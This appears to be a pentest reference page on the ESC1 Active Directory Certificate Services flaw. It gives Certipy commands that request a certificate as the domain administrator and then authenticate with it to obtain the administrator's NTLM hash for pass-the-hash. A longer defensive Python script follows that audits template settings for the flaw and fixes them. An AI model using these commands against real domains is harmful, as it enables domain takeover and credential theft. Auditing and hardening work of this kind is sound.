ESC1
ABOUT
ESC1 (from ESCalate) allows any domain user to impersonate (become) a Domain Admin or any other user: the user requests a certificate "as" the target account and then logs in with that certificate.
EXPLOITATION
Request Cert as Admin
certipy req -u 'Solomon.Reed@militech.local' -p 'SuperAgent12' -dc-ip 13.13.13.13 -target 13.13.13.13 -ca militech-DC-CA -template UserAuthentication -upn administrator@militech.local -debug
Auth as Admin
certipy auth -pfx administrator.pfx -dc-ip 13.13.13.13
The output includes the administrator's NTLM hash, which we can use for PTH (pass-the-hash).
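For the defensive side, a template is only open to this abuse when several settings line up at once: the requester may supply the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), the template allows client authentication (or has no EKU), no manager approval or authorized signature is required, low-privileged principals hold enroll rights, and a CA publishes it. The following audit check is an added example and is not code from the page or from Certipy; the attribute names are the real AD CS schema names, but the dictionary layout, the low-privilege principal set and the sample templates are constructed for this example (the template name UserAuthentication is taken from the command above).

```python
# Added example: audit certificate-template settings for the ESC1 combination.
# Attribute names follow the AD CS schema; the dict shape and the sample
# templates are constructed for this example, not taken from a real domain.

# Bit in msPKI-Certificate-Name-Flag: the requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: requests are held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let a certificate authenticate as the principal named in it.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals treated as "every domain user" (assumed set for this example).
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

ESC1_CONDITION_COUNT = 6


def esc1_findings(template):
    """Return the list of ESC1 conditions the template satisfies.

    The template is exploitable for ESC1 only when all six are present.
    """
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (SAN)")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # no EKU at all also permits authentication
        findings.append("usable for client authentication")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signatures required")
    if set(template["enroll_principals"]) & LOW_PRIV_PRINCIPALS:
        findings.append("enrollable by low-privileged users")
    if template["published"]:
        findings.append("published by a CA")
    return findings


def is_esc1_vulnerable(template):
    return len(esc1_findings(template)) == ESC1_CONDITION_COUNT


def remediate(template):
    """Return a copy with the usual fix: the requester no longer chooses the subject.

    Requiring manager approval (CT_FLAG_PEND_ALL_REQUESTS) would break the chain too.
    """
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed


# Constructed sample templates: the first matches the ESC1 pattern, the second
# lets the requester pick the subject but is only good for server authentication.
TEMPLATES = [
    {
        "name": "UserAuthentication",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["Domain Users"],
        "published": True,
    },
    {
        "name": "WebServer-Internal",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],  # Server Authentication only
        "enroll_principals": ["Domain Users"],
        "published": True,
    },
]

if __name__ == "__main__":
    for t in TEMPLATES:
        status = "ESC1" if is_esc1_vulnerable(t) else "ok"
        print(f"{t['name']}: {status} ({', '.join(esc1_findings(t))})")
```

In a real audit the dictionaries would be filled from the pKICertificateTemplate objects under CN=Certificate Templates in the Configuration partition and the enroll rights read from each template's security descriptor; the check itself stays the same.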
RESOURCES